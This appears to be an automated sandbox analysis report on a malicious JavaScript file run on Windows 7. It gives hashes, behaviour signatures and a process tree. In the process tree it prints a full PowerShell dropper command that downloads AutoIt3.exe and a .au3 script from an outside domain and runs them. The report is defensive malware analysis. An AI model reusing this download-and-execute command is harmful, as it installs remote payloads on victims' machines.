Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
07-11-2023 14:38
Static task
static1
Behavioral task
behavioral1
Sample
07112023_2238_app(060e45bf7b57d4).js
Resource
win7-20231023-en
4 signatures
150 seconds
General
-
Target
07112023_2238_app(060e45bf7b57d4).js
-
Size
252KB
-
MD5
9edd0adf749c9406b020d9ca613daa62
-
SHA1
701cc4130fd3b8b17d6692101b7bd80d9a14b68c
-
SHA256
aff263702a19eb6640636f8c2708147a5ce8a5577d86a57224ddbe0f51c7dafe
-
SHA512
99df3475b72b2576123a7a46338470346b30e6ac10d9bd8506c6b359de2bf7308d0d85ece3039f3388d6feed7a6e7774eb4300c4ecc4435bf6361e59ab8e52da
-
SSDEEP
6144:ge7hgXeerjqlI2Iro+ra4xB9ElITe7hgXeerjqlI2Iro+8:gIhgSlI23qa4xB9ElITIhgSlI23V
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1688 powershell.exe 1688 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1688 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2116 wrote to memory of 1688 2116 wscript.exe 28 PID 2116 wrote to memory of 1688 2116 wscript.exe 28 PID 2116 wrote to memory of 1688 2116 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\07112023_2238_app(060e45bf7b57d4).js1⤵
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://siliconerumble.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://siliconerumble.com:443/msijhoziucv' -OutFile 'jhoziucv.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'jhoziucv.au3'"; Stop-Process -Name "WScript"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688
-